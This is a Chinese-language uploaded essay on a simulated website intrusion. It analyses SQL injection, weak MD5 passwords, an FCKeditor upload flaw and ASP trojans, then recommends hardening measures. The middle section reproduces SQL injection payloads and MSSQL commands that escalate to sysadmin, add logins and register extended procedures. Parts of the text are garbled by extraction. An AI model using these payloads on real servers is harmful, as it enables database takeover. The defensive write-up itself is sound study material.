攻防手记IT安全攻防实战优秀论文IT安全Word下载.docx
- 文档编号:6421786
- 上传时间:2023-05-06
- 格式:DOCX
- 页数:15
- 大小:26.81KB
攻防手记IT安全攻防实战优秀论文IT安全Word下载.docx
《攻防手记IT安全攻防实战优秀论文IT安全Word下载.docx》由会员分享,可在线阅读,更多相关《攻防手记IT安全攻防实战优秀论文IT安全Word下载.docx(15页珍藏版)》请在冰点文库上搜索。
连接的源地址和目标地址
连接的类型
访问控制机制
内部的网络环境
组网协议(比如说,IP、IPX、DecNET等等)
r内部域名(常常合外部域名分开)
可以直接从内联网进行访问的各个系统的具体ip地址
:
已被发现的各系统上运行的TCP和UDP服务
已被发现的各系统的体系结构(例如,SPARC还是X86)
访问控制机制和相关的访问控制表(accesscontrollis,ACL)
远程访问
VOIP的类型和组织方式
远程系统的类型
身份验证机制
VPN和相关的协议(IPSec和PPTP)
2•黑客技术平民化很多时候,我非常敬佩的一些网络管员,他们用无
限的学习和工作时间,甚至在用自己的身体健康去换得网络的安全稳定。
但是,一个人的力量终究有限,再加上技能差距等因素,组织的信息安全平台都有可能遭受到重大打击。
对于大型的网络机构和信息中心,为了保障处理安全事务的及时,满足提高整体信息化安全等级的需求,付出了更多的资源和风险成本。
有许多网络安全技术人员或者网管员自己不能单独完成一个网络安全的整体规划,这是因为网络安全技术涵盖的范围太广,而许多安全产品本身就漏洞,网络管理员不可能对每个产品的或方案了如指掌,互联网成立他们最主要的学习平台。
下面引用一段黑客教案网站的宣言:
“我们力争把这里建设成为黑客初学者的网上家园,我们建站目的就是让更多想学习黑客技术的朋友们能通过本
站获得最基础、最系统的知识,使黑客技术平民化!
”看似高级神秘的攻击技术,被许多网络安全领域的“高手”们设计成不同功能模块,或者是集合上述多个步骤的集成化入侵工具,随意让人下载,我们一直面对的黑客可能就是你身边的同事和朋友。
攻击技术“平民化”,为本来就存在众多安全隐患的网络
“雪上加霜,火上浇油!
”
此次活动的入侵者使用了3个黑客攻击软件,即:
注入工具(扫描与溢出)、暴力破解词典(MD5散列数据库网站)、ASP脚本控制程序(已经归属于木马类病毒)。
三个黑客工具即可控制目标对象的入侵过程,让我们反思,很多安全网站攻防教程是教会了防御者防护的方法还是培养了最新一代“工具型”的黑客。
3•应用层弱点成为黑客首选
威胁是一种对组织及其资产构成潜在破坏的可能性因素,是客观存在的。
造成威胁的因素可分为物理环境、系统漏洞、人为因素。
根据威胁的动机,环境因素包括自然界不可抗的因素和其它物理因素;
系统漏洞可以包括网络设备漏洞、操作系统漏洞、代码漏洞等:
人为因素又可分为恶意和无意两种。
网络所面临的威胁很多,其中包括:
物理威胁(偷窃、废物搜寻、间谍行为、身份识别错误)、系统漏洞(乘虚而入、不安全服务、配置和初始化)、身份鉴别威胁(口令圈套、口令破解、算法考虑不周、编辑口令)、线缆连接威胁
(窃听、拨号进入、冒名顶替)、有害程序(病毒、代码炸弹、特洛伊木马)等。
概括起来,由于TCP/IP的设计漏洞,这些攻击包括:
源地址欺骗(Sourceaddressspoofing)或IP欺骗(IPspoofing)。
源路由选择欺骗(SourceRouting
(RIPAttacks)。
鉴
TCP序列号欺骗(TCP
spoofing)。
路由选择信息协议攻击
别攻击(AuthenticationAttacks)。
Sequeneenumberspoofing)。
TCP序列号轰炸攻击(TCP易欺骗性(Easeof
TCP/IP协议的服务很多,人们
TCP/IP协议数据流采用明文传输。
SYNFloodingAttack),简称SYN攻击spoofing)。
如今的互联网中基于
比较熟悉的有WW服务,FTP服务,电子邮件服务,不太熟悉的有TFTP月艮务,
NFS服务,Finger服务等等。
这些服务都存在不同程度上的安全缺陷,当用户构建安全可信网络时,就需要考虑,该提供哪些服务,要禁止哪些服务。
观看演示视频中我们得到了一个结论,直接从应用层的代表Web服务漏洞直接攻击
可获得意外的收获。
Web服务器位于宿主基础结构的前端,它与Internet直接相连,负责
接收来自客户端的请求,创建动态Web页并响应请求数据。
最初WW服务只提供静态的HTML页面,为力改变人们对网络互动请求的愿望,人们引入了CGI程
序,CGI程序让人们的主页活起来。
CGI程序可以接收用户的输入信息,一般用户是通过表格把输入信息传给CGI程序的,然后CGI程序可以根据用户的要求
进行一些处理,一般情况下会生成一个HTML文件,并传回给用户。
CGI程序很多都存在安全漏洞,很容易被黑客利用做一些非法的事情。
有很多人都认可“没有Web就没有Internet”。
Web服务是一种可以用来解决跨网络应用集成问题的开发模式,这种模式为实现“软件作为服务”提供了技术保障。
而“软件作为服务”实质上是一种提供软件服务的机制,这种机制可以在网络上暴露可编程接口,并通过这些接口来共享站点开放出来的功能。
可是在很多情况下,Web应用程序及Web站点往往易遭受到各种各样的攻击,数据在网络传输过程中也很容易被窃取或盗用。
很多安全厂商和专家预计在未来很长时间里,Web网络威胁还将进一步增加,各种人为的威胁将通过互联网执行具有“自我延续性”的恶意活动,尤其应注意那些针对大众网站的Web威胁。
•漏洞分析
漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。
具体举例来说,比如在IntelPentium芯片中存在的逻辑错误、在Sendmail早期版本中的编程错误、在NFS协议中认证方式上的弱点、在Unix系统管理员设置匿名Ftp服务时配置不当的问题都可能被攻击者使用。
因而这些都可以认为是系统中存在的安全漏洞,威胁到系统的安全。
安全漏洞向来是网络安全领域首要关注的问题,发现系统的安全漏洞也是黑客进行入侵和攻击的重要步骤。
据调查,约有80%勺国内网站存在明显漏
洞。
漏洞的存在使网络上不法分子的非法入侵与袭扰破坏有可乘之机,给网络安全带来了巨大的潜在危险。
具体来说,观看动画后感觉此系统的设置存在多处漏洞,漏洞分析如下。
1•代码编写漏洞检查代码中的安全性缺陷,是网站创建过程中
的一个关键要素,它与计划、设计和测试同等重要。
SQL注入的症结在于使用
字符串连接来构建SQL语句,我们可以扫描代码实现。
一般而言,检查的重点应放到搜索诸如“update”、“select”、“insert”、“exec”以及列举表名或数据库名之类的单词。
“阿D”等注入工具的扫描机制有很多,这里引用阿D主页上的信息:
//看看是什么权限的
and1=(SelectIS_MEMBER('
db_owner'
))
Andchar(124)+Cast(IS_MEMBER('
db_owner'
)asvarchar
(1))+char(124)=1。
--
//检测是否有读取某数据库的权限
and1=(SelectHAS_DBACCESS('
master'
Andchar(124)+Cast(HAS_DBACCESS('
)asvarchar
(1))+char(124)=1--
数字类型
andchar(124)+use叶char(124)=0
字符类型
'
andchar(124)+use叶char(124)=0and'
='
搜索类型
andchar(124)+user+char(124)=0and'
%'
爆用户名
anduser>
0and'
检测是否为SA权限
and1=(selectIS_SRVROLEMEMBER('
sysadmin'
))。
And
char(124)+Cast(IS_SRVR0LEMEMBER(0x730079007300610064006D0069006E00)asvarchar
(1))+char(124)=1--
..(从略)
//爆出长度
And(Selectchar(124)+Cast(Count
(1)asvarchar(8000))+char(124)From
D99_Tmp)=0。
—
更改sa口令方法:
用sql综合利用工具连接后,执行命令:
execsp_passwordNULL,新密码'
'
sa'
添加和删除一个SA权限的用户test:
execmaster.dbo.sp_addlogintest,ptlove
execmaster.dbo.sp_addsrvrolemembertest,sysadmin删除扩展存储过过程xp_cmdshell的语句:
execsp_dropextendedproc'
xp_cmdshell'
添加扩展存储过过程
EXEC[master]..sp_addextendedproc'
xp_proxiedadata'
'
c:
\winnt\system32\sqllog.dll'
GRANTexecOnxp_proxiedadataTOpublic
停掉或激活某个服务。
execmaster..xp_servicecontrol'
stop'
schedule'
start'
dbo.xp_subdirs
只列某个目录下的子目录。
xp_getfiledetails'
C:
\Inetpub\wwwroot\SQLInject\login.asp'
dbo.xp_makecab
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
\test.cab'
mszip'
1,
\Inetpub\wwwroot\SQLInject\securelogin.asp'
xp_terminate_process
停掉某个执行中的程序,但赋予的参数是ProcessIB
利用”工作管理员”,透过选单「检视」-「选择字段」勾选pid,就可以看到每个
执行程序的ProcessID
xp_terminate_process2484
xp_unpackcab
〃更新表内容
UpdatefilmsSETkind='
Dramatic'
Whereid=123
〃删除内容
deletefromtable_namewhereStockid=3
2•密码设置漏洞哈希函数将任意长度的二进制字符串映射为固定长度
的小型二进制字符串。
加密哈希函数有这样一个属性:
在计算上不大可能找到散列为相同的值的两个不同的输入;
也就是说,两组数据的哈希值仅在对应的数据也匹配时才会匹配。
数据的少量更改会在哈希值中产生不可预知的大量更改。
MD5算法的哈希值大小为128位。
MD5类的ComputeHash方法将哈希作为16字节的数组返回。
请注意,某些MD5实现会生成32字符的十六进制格式哈希。
若要与此类实现进行互操作,请将ComputeHash方法的返回值格式化为十六进制值。
一般来说,形如ef0020cf8c5e45b9(77169)的16位或者32位密码就是经过MD5加密的,MD5是一种不可逆的算法,但入侵者为什么能快速的就破解了呢?
我分析有两点原因:
(1)那些所谓的在线破解MD5密码,不过就是用一个庞大的MD5原文
密码:
加密密码数据库比对而已。
数据库中正好包含了77169的反向散列值。
(2)77169这个密码设置的过于简单,5位数字组成,这还是有可能被大型高性能主机破解的。
当然还有很多字典破解的工具,不过密码简
单的让人无法置信。
要说注入是由于程序员书写不规范造成的,造成系统被突破的最根本原因依然是密码问题。
还有很多网站提供MD5密码查询,但都无法
对数据库中的“d7f9061ae314ca0a”进行反向解密。
3.FCKeditor上传漏洞现在,许多的Web应用程序被设计成可
包含用于收集富文本数据的用户界面,因此,它们在外观和使用方面看起来更像桌面应用程序。
随着越来越多的网站将其内容交由访问者创建,标准文本框很快变得陈旧过时。
对于许多Web应用方案而言,标准HTML文本框无法提供富文本编辑器所能提供的功能或优势。
借助FCKeditor,无论服务器端采用何种技术,均可简便而轻松地嵌入富文本数据收集功能。
此网站后来也使用了FCKeditor,入侵者正式从FCKeditor找到了可以上传asa文件类型的漏洞。
三.网络加固建议针对Web服务的攻击有很多,例如对WE应用程序的
破坏、绕过验证与Session验证、获取管理权限、获取资源、针对主机漏洞与WE或全漏洞攻击、跨站脚本攻击及SQL注射攻击等等。
另外,硬件与物理环境的错误,也都会导致资源无法被客户端访问到。
安全面的Web安全防御要从
以下几个方面入手,构建出一个安全的防御架构:
资源保护
重要资源,如数据库中或文件系统上的数据;
物理环境,如UPS供电、
磁盘冗余、双机冗余;
Internet访问接口的访问控制,数据的授权与认证访问。
威胁和威胁建模
所有类型的威胁包括网络威胁、主机威胁、与应用的威胁;
重点放在Web应用的威胁,如:
SQL注入、跨网站脚本、输入篡改、劫获会话等;
掌握威胁建模的方法与步骤,使你能系统地全面地了解Web应用可能的威胁。
程序缺陷与服务漏洞
包括操作系统在某方面的弱点或特性,以及它有可能造成威胁的发生。
网络、主机或应用程序编写过程中可能存在缺陷。
攻击与对策
100%的安全是不存在的,当某人或者设备采取的危害资源的行为之后,应对威胁、减小危险的安全措施。
最后是应急响应、犯罪证据的取证,以及灾难恢复工作的执行效率。
在多数的网络中,我们不可能将Web主机直接曝露在Internet上,所以使用NAT(NetworkAddressTranslation,网络地址翻译)技术,将局域网中
Web服务器的内部地址翻译成合法的InternetIP地址使用,这是提高Web主
机安全性的普遍做法。
例如:
在一台路由器上要想对外发布IIS/FTP站点,
则只能使用路由器的端口映射(端口地址翻译)NAT技术来完成,如80端口映射成Web服务器,21端口映射成FTP服务器。
假定192.168.1.1和192.168.1.2是企业内部局域网的Web和FTP服务器的地址,80是Web服务器的端口21是FTP服务器的端口。
在CISCO的路由器做端口映射,可以通过下面两个命令实现:
ipnatinsidesourcestatictcp192.168.1.180202.86.149.180
ipnatinsidesourcestatictcp192.168.1.221202.86.149.121
最后是配合ACL入口规则的使用:
access-list101permittcpanyhost202.86.149.1eq80
intfacee0
ipaccess-group101in
本网站加固可首先利用传统方法,架构网络防护层,比如关闭外部网络访问3389端口等。
1•构建反向代理机制大家熟知的IISUnicode攻击,以及此次攻击
中使用的注入技术,因为这种攻击是选择了防火墙所允许的80端口,而包过滤
的防火墙无法对数据包内容进行核查,此时防火墙等同于虚设,即使在防火墙的屏障之后,也会被攻击者轻松拿下超级用户的管理权限。
另外一种做法就是使用反向代理技术,反向代理服务器可以避免有效的减少上述攻击。
它对外就表现为一个Web服务器,不同之处在于的这个服务器没有保存任何网页的真实数据,所有的静态网页或者CGI程序,都保存在内
部的Web服务器上。
因此对反向代理服务器的攻击并不会使得网页信息遭到破坏,这样就增强了Web服务器的安全性。
图2反向代理访问模式
反向代理能以软件方式来实现,女口Apachemod_proxy、ISAproxy等;
也可以在高速缓存器、负载均衡器等硬件设备上实现。
基于软件技术的反向代理负载均衡可以将优化的负载均衡策略和代理服务器的高速缓存技术结合在一起,提升静态网页的访问速度。
2•密码与后台管理密码问题是直接导致系统被入侵原因,因此网站
管理员需要变更为复杂性密码,其规则可以参考微软的操作系统建议,同样适合Web服务器页面的后台管理验证,如:
是否允许用户重新使用旧的密码(强制密码历史),在两次更改密码之间的时间(最大密码寿命以及最小密码寿命),最小密码长度(最小密码长度),以及用户是否必须混合使用大小写字母、数字和特殊字符(密码必须满足复杂性要求)。
我建议你最低要求,也应该采用每45天更改一次密码,或要
求至少8个字符的密码,并确保开启了密码必须满足复杂性要求设置。
另外需要防止后台入口的使用标准目录结构,如更换成某些注入工具字典中没有的后台目录名称。
当然,如果有更高安全要求可以启用SSL+CA验证
码的组合登录凭证,或者采用更高等级的动态(令牌)认证。
3•多层身份验证
在此方案中,Web服务器验证调用方的身份,并通过使用调用方的标识限制对本地资源的访问。
数据库验证ASP默认进程标识(它是权限最少的帐户)的身份(即数据库信任ASP应用程序),可监测ASP代码安全,并升级到SQLServer数据库实现多层身份认证,参见表2。
表2安全措施
类别
详细信息
身份验
证
•通过在IIS中使用集成Windows身份验证,在Web服务器上提供增强身份验证来验证原调用方的身份。
•在ASP.NET内使用Windows身份验证(不模拟)。
•通过将SQLServer配置为使用Windows身份验证,确保数据库连接的安全。
•数据库信任ASP.NET辅助进程以进行调用。
可以在数据
库中验证ASP.NET进程标识的身份。
授权
•使用绑定到原调用方的ACL在Web服务器上配置资源。
为了简化管理,将用户添加到Windows组中并在ACL中使用组。
•Web应用程序对原调用方执行.NET角色检查,以限制对页面的访问。
安全通
信
•保护在Web服务器和数据库之间传送的机密数据
•保护在原调用方和Web应用程序之间传送的机密数据
升级网页代码以及FCKeditor属性后,图3显示了此方案的建议安全配置
图3完整安全升级解决方案
4•防范ASP木马
Asp木马中最核心的技术就是利用脚本创建对象,然后利用cmd.exe命令来执行对文件的创建、删除以及修改等操作。
目前较为流行的利用FSO以及
不利用FSO技术的木马程序源代码。
说明:
FSC是对FileSystemObject的简称,IIS4以及后续版本中的
ASP的文件操作都可以通过FileSystemObject实现,包括文本文件的读写目录操作、文件的拷贝改名删除等。
FileSystemObject带来方便的同时,也具有非常大的风险性,利用FileSystemObject可以篡改并下载Fat以及FAT32分区上的任何文件,即使是ntfs,如果没有对权限进行很好的设置,同样也能遭到破坏。
在众多的asp木马中,海阳顶端网asp木马应该是比较成熟的,也是用得最多的asp木马,就其版本而言,到目前为止已经推出了数个版本:
海阳顶端网asp木马第一版、海阳顶端网asp木马xp版、海阳顶端网asp木马xp-net版、海阳顶端网asp木马2003版、海阳顶端asp木马安装插件版以及本次入侵中用到的海阳顶端网asp木马2006版。
目前有很多软件可以对asp源代码进行加密,例如asp木马免杀工具等。
其原理是采用一定的算法将源代码或者源代码中的关键字进行某种转换,经过转换后,源代码已经变为乱码或者显示为特定的字符形式。
但是随着杀毒
技术的提高和版本的升级,经过加密后的asp木马仍然不能保证躲过杀毒软件
的查杀。
ASP木马主要是通过三种组件FileSystemObject、WScript.Shell和Shell.Application来操作的,因此只要你在服务器上修改注册表,将这三种
组件改名,即可禁止木马运行、防范黑客入侵了飞二招能防范所有类型的上传漏洞,因为即使黑客将木马成功上传到服务器中,但是由于组件已经被改名,木马程序也是无法正常运行的!
具体而言,需要将FileSystemObject组件、WScript.Shell组件、Shell.Application组件改名,然后禁用Cmd.exe,就可以预防漏洞上传攻击。
总结其实我们可以把这次攻防比赛看成是一次模拟入侵测试,模
拟入侵测试是一种从外部观点来
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 攻防 手记 IT 安全 实战 优秀论文